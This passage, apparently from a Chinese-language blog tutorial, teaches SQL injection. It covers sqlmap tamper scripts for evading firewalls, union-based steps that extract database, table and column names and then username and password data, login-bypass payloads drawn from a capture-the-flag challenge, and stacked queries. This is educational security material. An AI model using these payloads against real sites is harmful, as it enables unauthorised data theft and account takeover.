%T%A%B%L%E\n\n<strong>11\u3001sp_password.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1amssql\n\u4f5c\u7528\uff1a\u5c06sp_password\u8ffd\u52a0\u5230\u6709\u6548\u8f7d\u8377\u540e\uff0c\u4ee5\u4fbf\u4eceDBMS\u65e5\u5fd7\u4e2d\u81ea\u52a8\u6df7\u6dc6\u3002\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('1 AND 9227=9227-- ')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a1 AND 9227=9227-- sp_password\n\n<strong>12\u3001charencode.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5bf9\u6307\u5b9a\u7684payload\u5168\u90e8\u4f7f\u7528url\u7f16\u7801\uff08\u4e0d\u5904\u7406\u5df2\u8fdb\u884c\u7f16\u7801\u7684\u5b57\u7b26\uff09\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD FROM%20TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45\n\n<strong>13\u3001randomcase.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\u3001SQLite 3\n\u4f5c\u7528\uff1a\u5c06\u5b57\u7b26\u66ff\u6362\u4e3a\u968f\u673a\u5927\u5c0f\u5199\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('INSERT')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aInSeRt\n\n<strong>14\u3001charunicodeencode.py<\/strong>\n\u9002\u7528\u6570\u636e\u5e93\uff1aASP \u3001ASP.NET\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2000 \u3001Microsoft SQL Server 2005\u3001MySQL 5.1.56 \u3001PostgreSQL 9.0.3\n\u4f5c\u7528\uff1a\u9002\u7528\u5b57\u7b26\u4e32\u7684Unicode\u7f16\u7801\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT FIELD%20FROM TABLE')\n\u4f7f\u7528\u811a\u672c\u540e\uff1a%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045\n\n<strong>15\u3001space2comment.py<\/strong>\n\u6d4b\u8bd5\u6570\u636e\u5e93\uff1aMicrosoft SQL Server 2005\u3001MySQL 4, 5.0 and 
5.5\u3001Oracle 10g\u3001PostgreSQL 8.3, 8.4, 9.0\n\u4f5c\u7528\uff1a\u5c06\u7a7a\u683c\u66ff\u6362\u4e3a\/**\/\n\u4f7f\u7528\u811a\u672c\u524d\uff1atamper('SELECT id FROM users')\n\u4f7f\u7528\u811a\u672c\u540e\uff1aSELECT\/**\/id\/**\/FROM\/**\/users<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\uff0c\u6709\u65f6\u5019\u6211\u4eec\u4e5f\u4f1a\u9047\u5230\u9700\u8981\u81ea\u5df1\u5199tamper\u7ed5waf\u7684\u60c5\u51b5\uff0c\u8fd9\u91cc\u7b80\u5355\u770b\u770btamper\u957f\u5565\u6837\uff0c\u6bd4\u5982\u6211\u4eec\u770b\u5230space2plus.py\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n    retVal = payload\n\n    if payload:\n        retVal = \"\"\n        quote, doublequote, firstspace = False, False, False\n\n        for i in xrange(len(payload)):\n            if not firstspace:\n                if payload&#91;i].isspace():\n                    firstspace = True\n                    retVal += \"+\"\n                    continue\n\n            elif payload&#91;i] == '\\'':\n                quote = not quote\n\n            elif payload&#91;i] == '\"':\n                doublequote = not doublequote\n\n            elif payload&#91;i] == \" \" and not doublequote and not quote:\n                retVal += \"+\"\n                continue\n\n            retVal += payload&#91;i]\n\n    return retVal<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6e90\u7801\u8fd8\u662f\u633a\u7b80\u5355\u7684\uff0c\u6211\u4eec\u53ea\u7528\u6539tamper\u51fd\u6570\u5c31\u597d\u4e86\uff0c\u6bd4\u5982\u6211\u4eec\u60f3\u5199\u4e00\u4e2a\u628a=\u66ff\u6362\u6210&#8221;like&#8221;\uff0c\u7a7a\u683c\u66ff\u6362\u6210\u6362\u884c\u7b26\u7684\u811a\u672c\uff0c\u5c31\u53ef\u4ee5\u8fd9\u6837\u5199\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python\n\n\"\"\"\nCopyright (c) 
2006-2022 sqlmap developers (https:\/\/sqlmap.org\/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.compat import xrange\nfrom lib.core.enums import PRIORITY\n\n__priority__ = PRIORITY.LOW\n\ndef dependencies():\n    pass\n\ndef tamper(payload, **kwargs):\n\n\n    retVal = payload\n    retVal = retVal.replace(\"=\", \" like \")\n    retVal = retVal.replace(\" \", chr(0x0a))\n\n\n    return retVal<\/code><\/pre>\n\n\n\n<p>\u6bd4\u5982\u628a\u8fd9\u4e2a\u811a\u672c\u547d\u540d\u4e3atest.py\uff0c\u7136\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u8fd9\u4e48\u4f7f\u7528\u4e86\uff1a<\/p>\n\n\n\n<pre id=\"block-03c91bca-2907-426b-845a-995435f2f078\" class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/xxx\/Less-1\/?id=1\" --tamper=\"test.py\"<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">SQL\u6ce8\u5165\u7b80\u4ecb<\/h1>\n\n\n\n<p><strong>sql\u6ce8\u5165\u4ea7\u751f\u7684\u672c\u8d28<\/strong>\uff0c\u662f\u7531\u4e8e\u5f00\u53d1\u8005\u6ca1\u6709\u5bf9\u7528\u6237\u7684\u8f93\u5165\u505a\u51fa\u4e25\u683c\u7684\u9650\u5236\uff0c\u5bfc\u81f4\u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u6076\u610f\u7684\u8f93\u5165\u62fc\u63a5\u6b63\u5e38\u7684sql\u8bed\u53e5\u6700\u540e\u6267\u884c\u547d\u4ee4\u3002<\/p>\n\n\n\n<p>sql\u91cc\u6709\u56db\u5927\u6700\u5e38\u89c1\u7684\u64cd\u4f5c\uff0c\u5373<strong>\u589e\u5220\u67e5\u6539<\/strong>\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u589e\u3002\u589e\u52a0\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a: <code>INSERT table_name(columns_name) VALUES(new_values)<\/code>\u3002<\/li>\n\n\n\n<li>\u5220\u3002\u5220\u9664\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a: <code>DELETE table_name WHERE condition<\/code>\u3002<\/li>\n\n\n\n<li>\u67e5\u3002\u67e5\u627e\u6570\u636e\u3002\u5176\u7b80\u5355\u7ed3\u6784\u4e3a\uff1a<code>SELECT columns_name FROM table_name WHERE 
condition<\/code>\u3002<\/li>\n\n\n\n<li>\u6539\u3002\u6709\u4fee\u6539\/\u66f4\u65b0\u6570\u636e\u3002\u7b80\u5355\u7ed3\u6784\u4e3a:<code>UPDATE table_name SET column_name=new_value WHERE condition<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p>MySQL 5.0\u4ee5\u4e0a\u7248\u672c\u5b58\u5728\u4e00\u4e2a\u5b58\u50a8\u7740\u6570\u636e\u5e93\u4fe1\u606f\u7684\u4fe1\u606f\u6570\u636e\u5e93&#8211;<strong>INFORMATION_SCHEMA<\/strong> \uff0c\u5176\u4e2d\u4fdd\u5b58\u7740\u5173\u4e8eMySQL\u670d\u52a1\u5668\u6240\u7ef4\u62a4\u7684\u6240\u6709\u5176\u4ed6\u6570\u636e\u5e93\u7684\u4fe1\u606f\uff0c\u5982\u6570\u636e\u5e93\u540d\uff0c\u6570\u636e\u5e93\u7684\u8868\uff0c\u8868\u680f\u7684\u6570\u636e\u7c7b\u578b\u4e0e\u8bbf\u95ee\u6743\u9650\u7b49\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8fd9\u4e2a\u6570\u636e\u5e93\u83b7\u53d6\u5176\u4ed6\u6570\u636e\u5e93\u7684\u4fe1\u606f\u3002<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>information_schema<\/strong> \u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u8bb0\u5f55\u5f53\u524d\u6570\u636e\u5e93\u7684\u6570\u636e\u5e93\uff0c\u8868\uff0c\u5217\uff0c\u7528\u6237\u6743\u9650\u7b49\u4fe1\u606f<\/li>\n\n\n\n<li><strong>SCHEMATA<\/strong> \u50a8\u5b58mysql\u6240\u6709\u6570\u636e\u5e93\u7684\u57fa\u672c\u4fe1\u606f\uff0c\u5305\u62ec\u6570\u636e\u5e93\u540d\uff0c\u7f16\u7801\u7c7b\u578b\u8def\u5f84\u7b49<\/li>\n\n\n\n<li><strong>TABLES<\/strong> \u50a8\u5b58mysql\u4e2d\u7684\u8868\u4fe1\u606f\uff0c\u5305\u62ec\u8fd9\u4e2a\u8868\u662f\u57fa\u672c\u8868\u8fd8\u662f\u7cfb\u7edf\u8868\uff0c\u6570\u636e\u5e93\u7684\u5f15\u64ce\u662f\u4ec0\u4e48\uff0c\u8868\u6709\u591a\u5c11\u884c\uff0c\u521b\u5efa\u65f6\u95f4\uff0c\u6700\u540e\u66f4\u65b0\u65f6\u95f4\u7b49<\/li>\n\n\n\n<li><strong>COLUMNS<\/strong> 
\u50a8\u5b58mysql\u4e2d\u8868\u7684\u5217\u4fe1\u606f\uff0c\u5305\u62ec\u8fd9\u4e2a\u8868\u7684\u6240\u6709\u5217\u4ee5\u53ca\u6bcf\u4e2a\u5217\u7684\u4fe1\u606f\uff0c\u8be5\u5217\u662f\u8868\u4e2d\u7684\u7b2c\u51e0\u5217\uff0c\u5217\u7684\u6570\u636e\u7c7b\u578b\uff0c\u5217\u7684\u7f16\u7801\u7c7b\u578b\uff0c\u5217\u7684\u6743\u9650\uff0c\u5217\u7684\u6ce8\u91ca\u7b49<\/li>\n<\/ul>\n\n\n\n<p>\u9ad8\u7248\u672c\u65f6\u6211\u4eec\u6709information_schema\u6240\u4ee5\u53ef\u4ee5\u76f4\u63a5\u5f97\u5230\u60f3\u8981\u7684\u540d\u79f0\uff0c\u800c\u4f4e\u4e8e5.0\u540e\u6211\u4eec\u7684\u6ce8\u5165\u5f80\u5f80\u53ea\u80fd\u4f9d\u9760\u731c\u6216\u8005\u7206\u7834\u5f97\u5230\u8868\u540d\u7b49\u6240\u9700\u8981\u7684\u540d\u79f0\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">1.\u5e38\u89c4\u6ce8\u5165<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u8054\u5408\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8054\u5408\u6ce8\u5165\u5373union\u6ce8\u5165\uff0c\u5176\u4f5c\u7528\u5c31\u662f\uff0c\u5728\u539f\u6765\u67e5\u8be2\u6761\u4ef6\u7684\u57fa\u7840\u4e0a\uff0c\u901a\u8fc7\u7cfb\u7edf\u5173\u952e\u5b57<code>union<\/code>\u4ece\u800c\u62fc\u63a5\u4e0a\u6211\u4eec\u81ea\u5df1\u7684<code>select<\/code>\u8bed\u53e5\uff0c\u7136\u540e\u628a\u540e\u9762<code>select<\/code>\u5f97\u5230\u7684\u7ed3\u679c\u5c06\u62fc\u63a5\u5230\u524d\u9762<code>select<\/code>\u7684\u7ed3\u679c\u540e\u8fb9\u3002\u5982\uff1a\u524d\u4e2a<code>select<\/code>\u5f97\u52302\u6761\u6570\u636e\uff0c\u540e\u4e2a<code>select<\/code>\u4e5f\u5f97\u52302\u6761\u6570\u636e\uff0c\u90a3\u4e48\u540e\u4e2a<code>select<\/code>\u7684\u6570\u636e\u5c06\u62fc\u63a5\u5230\u7b2c\u4e00\u4e2a<code>select<\/code>\u8fd4\u56de\u7684\u5185\u5bb9\u4e2d\u3002<\/p>\n\n\n\n<p>\u8054\u5408\u6ce8\u5165\u6709\u5b83\u7684\u5229\u7528\u6761\u4ef6\uff0cUNION \u5185\u90e8\u7684&nbsp;SELECT 
\u8bed\u53e5\u5fc5\u987b\u62e5\u6709\u76f8\u540c\u6570\u91cf\u7684\u5217\uff0c\u5217\u4e5f\u5fc5\u987b\u62e5\u6709\u76f8\u4f3c\u7684\u6570\u636e\u7c7b\u578b\uff0c\u6bcf\u6761&nbsp;SELECT \u8bed\u53e5\u4e2d\u7684\u5217\u7684\u987a\u5e8f\u5fc5\u987b\u76f8\u540c\uff0c\u4e5f\u5c31\u662f\u8bf4\u53ea\u80fd\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1,2,3 from table_name1 union select 4,5,6 from table_name2;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u6211\u4eec\u5728\u8054\u5408\u6ce8\u5165\u4e4b\u524d\u5f80\u5f80\u9700\u8981\u5148\u5229\u7528 <code>order\/group by n<\/code> \u5224\u65ad\u5b57\u6bb5\u7684\u6570\u91cf\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u8054\u5408\u67e5\u8be2\u6ce8\u5165\u6b65\u9aa4<\/h2>\n\n\n\n<p>\u5047\u5982\u5bf9\u4e8eurl\/?id=1\uff0c\u4e14\u540e\u7aef\u4ee3\u7801\u7528\u5355\u5f15\u53f7\u5305\u88f9\u53c2\u6570\uff0c\u6211\u4eec\u7684\u6ce8\u5165\u6b65\u9aa4\u4e3a\uff08\u5176\u5b9e\u5373sqllib\u7b2c\u4e00\u5173\uff0cbuuoj\u6709\u5728\u7ebf\u73af\u5883\uff09<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">MySQL &gt;= 5.0<\/h3>\n\n\n\n<p><strong>1) \u786e\u5b9a\u5b57\u6bb5\u7684\u6570\u91cf<\/strong><\/p>\n\n\n\n<p>\u901a\u8fc7\u4ece1\u5f00\u59cb\u6539\u53d8n\u7684\u5927\u5c0f\uff0c\u5982\u679c\u7f51\u9875\u51fa\u73b0\u62a5\u9519\u5219\u8bc1\u660en\u5927\u4e8e\u771f\u5b9e\uff0c\u56e0\u4e3aorder by n\u662f\u5bf9\u7b2cn\u4e2a\u5b57\u6bb5\u8fdb\u884c\u6392\u5e8f\u7684\u610f\u601d\uff0c\u5982\u679cn\u7684\u503c\u5927\u4e8e\u771f\u5b9e\u7684\u5b57\u6bb5\u6570\u91cf\u81ea\u7136\u5c31\u4f1a\u62a5\u9519\u4e86\u3002\u81f3\u4e8e\u6700\u540e\u7684&#8211;+\u662f\u6ce8\u91ca\u7b26\u7684\u610f\u601d\uff0c\u4e3a\u4e86\u6ce8\u91ca\u6389\u539f\u6709\u7684sql\u8bed\u53e5\u6267\u884c\u6211\u4eec\u81ea\u5df1\u7684\uff0c\u4e5f\u53ef\u4ee5\u7528%23\u5373#\u4ee3\u66ff\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=1' order by n --+<\/code><\/pre>\n\n\n\n<p>\u6216\u8005\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>?id=1' group by n --+<\/code><\/pre>\n\n\n\n<p>group\u662f\u5bf9\u6570\u636e\u8fdb\u884c\u5206\u7ec4\uff0c\u4e5f\u53ef\u4ee5\u8d77\u5230\u76f8\u540c\u7684\u6548\u679c\u3002<\/p>\n\n\n\n<p><strong>2) \u5224\u65ad\u56de\u663e\u4f4d<\/strong><\/p>\n\n\n\n<p>\u6709\u65f6\u5019\u9875\u9762\u91cc\u53ea\u6709\u4e00\u4e2a\u56de\u663e\u4f4d\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u7528-1\u4fdd\u8bc1\u524d\u9762\u7684\u67e5\u8be2\u67e5\u4e0d\u51fa\u6570\u636e\u4ee5\u786e\u4fdd\u540e\u9762\u7684\u8054\u5408\u67e5\u8be2\u80fd\u6b63\u5e38\u67e5\u8be2\uff0c\u5047\u5982\u6211\u4eec\u786e\u5b9a\u4e86\u4e00\u5171\u6709\u4e09\u4e2a\u5b57\u6bb5\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,3 --+<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7\u6570\u5b57\u662f\u51e0\u5224\u65ad\u56de\u663e\u4f4d<\/p>\n\n\n\n<p><strong>3) \u83b7\u53d6\u7cfb\u7edf\u6570\u636e\u5e93\u540d<\/strong><\/p>\n\n\n\n<p>group_concat()\u7684\u4f5c\u7528\u662f\u628a\u56de\u663e\u653e\u5230\u4e00\u884c\u91cc\uff0c\u4fbf\u4e8e\u89c2\u5bdf<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+<\/code><\/pre>\n\n\n\n<p><strong>4) \u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,database() --+<\/code><\/pre>\n\n\n\n<p><strong>5) \u83b7\u53d6\u6570\u636e\u5e93\u4e2d\u7684\u8868<\/strong><\/p>\n\n\n\n<p>\u83b7\u53d6\u5f53\u524d\u6570\u636e\u7684\u6240\u6709\u8868\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+<\/code><\/pre>\n\n\n\n<p>\u6216\u8005<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' 
--+<\/code><\/pre>\n\n\n\n<p>\u5373\u83b7\u53d6security\u6570\u636e\u5e93\u4e0b\u7684\u6240\u6709\u8868\u540d<\/p>\n\n\n\n<p><strong>6) \u83b7\u53d6\u8868\u91cc\u7684\u5217\u540d(\u5373\u5b57\u6bb5\u540d)<\/strong><\/p>\n\n\n\n<p>\u83b7\u5f97users\u8868\u4e0b\u7684\u6240\u6709\u5b57\u6bb5\u540d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+<\/code><\/pre>\n\n\n\n<p><strong>7) \u83b7\u53d6\u6570\u636e<\/strong><\/p>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u60f3\u83b7\u5f97users\u8868\u4e0busername\u4ee5\u53capassword\u7684\u503c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1' union select 1,2,group_concat(username , password) from users --+<\/code><\/pre>\n\n\n\n<p>\u7b80\u5355\u7684\u8bf4\uff0c<strong>\u67e5\u5e93\u540d-&gt;\u67e5\u8868\u540d-&gt;\u67e5\u5b57\u6bb5\u540d-&gt;\u67e5\u6570\u636e<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">MySQL &lt; 5.0<\/h3>\n\n\n\n<p>MySQL &lt; 5.0 \u6ca1\u6709\u4fe1\u606f\u6570\u636e\u5e93<strong>information_schema<\/strong>\uff0c\u6240\u4ee5\u53ea\u80fd\u624b\u5de5\u7206\u7834\u4e86\uff0c\u4e00\u822c\u7528\u4e8e\u76f2\u6ce8\uff0c\u4e0d\u8fc7\u73b0\u5728\u5e02\u9762\u4e2d\u57fa\u672c\u4e0a\u5f88\u591a\u7684\u6570\u636e\u5e93\u90fd\u662f5.0\u4ee5\u4e0a\u7684\u7248\u672c\uff0c\u6682\u65f6\u8fd8\u6ca1\u9047\u5230\u8fc75.0\u4ee5\u4e0b\u7684\u3002<\/p>\n\n\n\n<p>\u8bf4\u5230\u8054\u5408\u6ce8\u5165\u6211\u5c31\u60f3\u5230\u8054\u5408\u6ce8\u5165\u7684\u4e00\u4e2a\u6280\u5de7\uff0c\u5c31\u662f\u63d2\u5165\u4e34\u65f6\u8868\uff0c\u987a\u4fbf\u518d\u6765\u8c08\u8c08sql\u4e07\u80fd\u5bc6\u7801<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">sql\u4e07\u80fd\u5bc6\u7801<\/h2>\n\n\n\n<h4 
class=\"wp-block-heading\">union\u63d2\u5165\u4e34\u65f6\u8868<\/h4>\n\n\n\n<p>[GXYCTF2019]BabySQli1\u5c31\u662f\u8fd9\u6837\u4e00\u9053\u4f8b\u9898\u3002\u5982\u679c\u67d0\u4e2a\u7f51\u7ad9\u7684\u540e\u53f0\u6e90\u7801\u662f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from user where username = '$name'<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u5229\u7528sqli\u7684\u8054\u5408\u6ce8\u5165\u7684\u7279\u6027\uff0c\u5728\u4f7f\u7528\u8054\u5408\u6ce8\u5165\u65f6\uff0c\u5982\u679c\u4f60\u67e5\u8be2\u7684\u6570\u636e\u4e0d\u5b58\u5728\uff0c\u90a3\u4e48\u5c31\u4f1a\u751f\u6210\u4e00\u4e2a\u5185\u5bb9\u4e3anull\u7684\u865a\u62df\u6570\u636e\uff0c\u4e5f\u5c31\u662f\u8bf4<strong>\u5728\u8054\u5408\u67e5\u8be2\u5e76\u4e0d\u5b58\u5728\u7684\u6570\u636e\u65f6\uff0c\u8054\u5408\u67e5\u8be2\u5c31\u4f1a\u6784\u9020\u4e00\u4e2a\u865a\u62df\u7684\u6570\u636e\u3002<\/strong>\u6240\u4ee5\u8fd9\u65f6\u6211\u4eec\u5c31\u53ef\u4ee5\u5728\u6ce8\u5165\u65f6\u6dfb\u52a0\u6211\u4eec\u9700\u8981\u7684\u4fe1\u606f\u6765\u5b8c\u6210\u6211\u4eec\u7684\u76ee\u7684\uff0c\u6bd4\u5982\u6211\u4eec\u4f7f\u7528union select &#8216;dingzhen&#8217;,&#8217;123456&#8217;\uff0c\u6570\u636e\u5e93\u4e2d\u5c31\u4f1a\u51fa\u73b0\u4e00\u6761\u4e34\u65f6\u6570\u636e\uff0c\u5373dingzhen\u548c123456<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-11.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"324\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-11.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1392\"  sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/div><\/figure>\n\n\n\n<p>\u56e0\u6b64\u5728\u53ef\u4ee5\u8054\u5408\u6ce8\u5165\u7684\u60c5\u51b5\u4e0b\u53ea\u8981\u8f93\u5165payload:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>name=dingzhen' union select 'admin','123456'--+ &amp;passwd=123456<\/code><\/pre>\n\n\n\n<p>\u5373\u53ef\u6210\u529f\u5229\u7528\u521b\u5efa\u7684\u4e34\u65f6\u6570\u636e\u767b\u5f55(\u771f\u5b9e\u60c5\u51b5\u4e0b\u8fd8\u9700\u8981\u9002\u5f53\u4fee\u6539payload)<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u6c38\u771f\u8bed\u53e5<\/h4>\n\n\n\n<p>\u8fd9\u4e2a\u5e94\u8be5\u662f\u6700\u5e38\u89c1\u7684\uff0c\u5373\u4f7f\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' or 1='1\n'or'='or'<\/code><\/pre>\n\n\n\n<p>\u7b49\u7b49\uff0c\u901a\u8fc7\u4e00\u4e2a\u6c38\u771f\u5224\u65ad\u767b\u5f55<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u7528\\\u6784\u9020\u4e07\u80fd\u5bc6\u7801\u767b\u5f55<\/h4>\n\n\n\n<p>\u4e00\u822c\u6765\u8bf4\u6784\u9020\u4e07\u80fd\u7684\u5bc6\u7801\u7684\u65f6\u5019\u90fd\u9700\u8981\u5148\u7528\u5f15\u53f7\u95ed\u5408\uff0c\u5982\u679c\u5f15\u53f7\u88ab\u8fc7\u6ee4\u4e86\uff0c\u6211\u4eec\u5176\u5b9e\u8fd8\u662f\u53ef\u4ee5\u7528\\\u6784\u9020\u4e07\u80fd\u5bc6\u7801\uff0c\u5047\u5982\u540e\u53f0\u7684\u6e90\u7801\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select user from user where user='$_POST&#91;username]' and password='$_POST&#91;password]';<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u4f20\u5165<code>username=admin\\&amp;password=or 2&gt;1#<\/code>\uff0c\u8fd9\u65f6\u540e\u53f0\u63a5\u53d7\u5230\u7684\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from users where username='admin\\' and password=' or 
2&gt;1#';<\/code><\/pre>\n\n\n\n<p>\\\u4f1a\u95ed\u5408\u6389admin\u540e\u9762\u90a3\u4e2a\u5f15\u53f7\uff0c\u76f8\u5f53\u4e8e\u63a5\u6536\u5230where username=&#8217;admin and password=&#8217; or 2&gt;1 \uff0c\u8fd9\u663e\u7136\u662f\u4e00\u4e2a\u6c38\u771f\u5224\u65ad\uff0c\u867d\u7136\u4e0d\u5b58\u5728admin and password=\u8fd9\u4e2a\u7528\u6237\uff0c\u4f46\u6211\u4eec\u7528or 2&gt;1\u8ba9\u8fd9\u4e2a\u6761\u4ef6\u6c38\u8fdc\u6210\u7acb\u4e86\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u5806\u53e0\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5206\u53f7<code>;<\/code>\u4e3aMYSQL\u8bed\u53e5\u7684\u7ed3\u675f\u7b26\uff0c\u82e5\u5728\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u5229\u7528\u6b64\u65b9\u6cd5\u6267\u884c\u5176\u4ed6\u6076\u610f\u8bed\u53e5\u3002\u6bd4\u5982\u6709\u51fd\u6570mysqli_multi_query()\uff0c\u5b83\u652f\u6301\u6267\u884c\u4e00\u4e2a\u6216\u591a\u4e2a\u9488\u5bf9\u6570\u636e\u5e93\u7684\u67e5\u8be2\uff0c\u67e5\u8be2\u8bed\u53e5\u4f7f\u7528\u5206\u53f7\u9694\u5f00\u3002\u5982\u679c\u6b63\u5e38\u7684\u8bed\u53e5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1;<\/code><\/pre>\n\n\n\n<p>\u82e5\u652f\u6301\u5806\u53e0\u6ce8\u5165\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5728\u540e\u9762\u6dfb\u52a0\u81ea\u5df1\u7684\u8bed\u53e5\u6267\u884c\u547d\u4ee4\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select 1;;show tables%23<\/code><\/pre>\n\n\n\n<p>\u4f46\u901a\u5e38\u591a\u8bed\u53e5\u6267\u884c\u65f6\uff0c\u82e5\u524d\u6761\u8bed\u53e5\u5df2\u8fd4\u56de\u6570\u636e\uff0c\u5219\u4e4b\u540e\u7684\u8bed\u53e5\u8fd4\u56de\u7684\u6570\u636e\u901a\u5e38\u65e0\u6cd5\u8fd4\u56de\u524d\u7aef\u9875\u9762\uff0c\u53ef\u8003\u8651\u4f7f\u7528<code>RENAME<\/code>\u5173\u952e\u5b57\uff0c\u5c06\u60f3\u8981\u7684\u6570\u636e\u5217\u540d\/\u8868\u540d\u66f4\u6539\u6210\u8fd4\u56de\u6570\u636e\u7684SQL\u8bed\u53e5\u6240\u5b9a\u4e49\u7684\u8868\/\u5217\u540d \u3002\u5177\u4f53\u53c2\u8003\uff1a<a 
